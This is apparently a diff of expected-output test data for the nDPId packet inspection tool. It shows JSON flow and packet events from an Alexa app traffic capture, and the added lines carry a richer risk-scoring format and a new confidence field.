-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1490976030681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1490976030681,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWlBAAEARM1+sECrYrBAqARy+ADUAMIK\/xAMBAAABAAAAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAQ=="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1490976030758,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1490976030758,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQalIAAEABYqGsECoBrBAq2AUBAe6sECoqRQAANMRJQAA\/Bpp3rBAq2DRV0cXXygG707KdlouELZKAEAGm9GwAAAEBCAoA9kpTbQnnbg=="}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1490976030890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1490976030890,"pkt":"ePiC0\/vCAMDKkaPvCABFAABU0XFAAEARvC2sECoBrBAq2AA1HL4AQPRGxAOBgAABAAEAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAABwABDbvFrk="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01238{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}}
+00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01024{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1490976031581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1490976031581,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WlFAAEARM2SsECrYrBAqAaBGADUAKk94StwBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1490976031687,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976031687,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0Y5AAEARu\/+sECoBrBAq2AA1oEYAUS8VStyBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAA8ACwhwaXRhbmd1acASwC4AAQABAAAADwAENF7ohg=="}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="}
